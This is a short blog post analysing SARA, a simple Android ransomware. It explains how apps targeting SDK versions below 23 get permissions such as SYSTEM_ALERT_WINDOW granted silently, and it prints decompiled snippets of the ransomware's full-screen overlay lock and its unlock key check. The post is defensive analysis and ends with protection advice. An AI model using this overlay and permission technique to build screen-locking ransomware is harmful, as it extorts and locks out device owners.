Open in app

Sign in

Write

Sign in

Fear of the Target SDK, a story of a Ransomware

+Ch0pin🕷️
3 min readSep 9, 2021

--

The main motivation behind this article was a recent (9/2021) twitter post from @elhackernet about SARA aka a Simple Android Ransomware Attack software. As I am kinda obsessed with malware applications, I downloaded the sample and started digging around.

Here is what I found…

Once upon a time in AndroidLand

There was a time when life was much easier for Android Malware developers. Back in those days of Android 5 or earlier (SDK 22 ), you didn’t have to ask the user’s permission to access their personal info, you just had to declare the appropriate manifest permissions and they were magically approved. I know… it sounds obnoxious… but we can’t prevent something if we don’t know the risk behind it. I am sure those Tour de France bicyclists bellow would agree with me …

Now in AndroidLand ?

Now things got much better as there are more “CAN NOT DO” than ever and I won’t go through them as I want to keep this post very short. I just want to get your attention on the Note bellow:

What stands out of the above statement is the starting “If” and the missing of “else” at the end. To understand what I mean, create a simple Android Project and add the following statements in the AndroidManifest:

<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.READ_CALENDAR"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>

Now change the build.gradle script’s targetSdkVersion to something lower than 23:

defaultConfig {
    applicationId "com.demostrating.overlays"
    minSdkVersion 16
    targetSdkVersion 22
    versionCode 1
    versionName "1.0"

    testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
}

Finally, install it on an Android 9 device and inspect the application’s approved permissions:

Notice that despite no permission has been requested, all the ones declared in the android manifest have been approved silently by the system.

Where the Ransomware comes in to the frame ?

SARA is indeed a very simple ransomware where all the malicious activity takes place at com.termuxhackers.id.MyService class. More specifically:

The app will create an instance of the windowManager:

this.windowManager = (WindowManager) getSystemService(“window”);
 this.myView = (ViewGroup) ((LayoutInflater) getSystemService(“layout_inflater”)).inflate(R.layout.main, (ViewGroup) null);

A view:

this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(R.layout.main, (ViewGroup) null);

Some Layout Parameters, which in sort are creating an overlay that will cover the screen (the 2002 is a window type TYPE_PHONE):

WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(-2, -2, 2002, 1, -3);

It will then set the view using the window manager instance:

this.windowManager.addView(this.myView, layoutParams);

And will request the user for a key in order to remove the overlay (the “key_pass” key can change):

if (this.this$0.e1.getText().toString().equals(“key_pass”)) 
 this.this$0.windowManager.removeView(this.this$0.myView);

What stands out here though is the fact that in order for an app to create a TYPE_PHONE overlay it needs the SYSTEM_ALERT_WINDOW. While for SDK versions greater or equal to 23 the user has explicitly to approve this permission, for other versions the permission is approved by default. But guess what … by the time that the developer targets an SDK lower than 23, this permission will be automatically approved:

package="com.termuxhackers.id" ... platformBuildVersionName="10">
    <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>

How to protect

Fortunately, Google doesn’t allow application’s that target low SDKs to be uploaded on Google play, while the minimum API level allowed changes periodically. For example, starting in November 2021, app updates will be required to target API level 30 or above and adjust for behavioural changes in Android 11.

Additionally, newer android versions (10 or higher) will display a warning about the application’s permissions during installation but will still approve some special permissions (e.g. the SYSTEM_ALERT_WINDOW):

Application’s though that come from unknown sources still impose a great risk, thus next time, think twice…

Android
Android Security
Malware
Ransomware

--

--

+Ch0pin🕷️
+Ch0pin🕷️

Written by +Ch0pin🕷️

886 Followers
7 Following

https://www.linkedin.com/in/valsamaras/, developer of https://github.com/Ch0pin/medusa, follow me on twitter https://twitter.com/Ch0pin

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams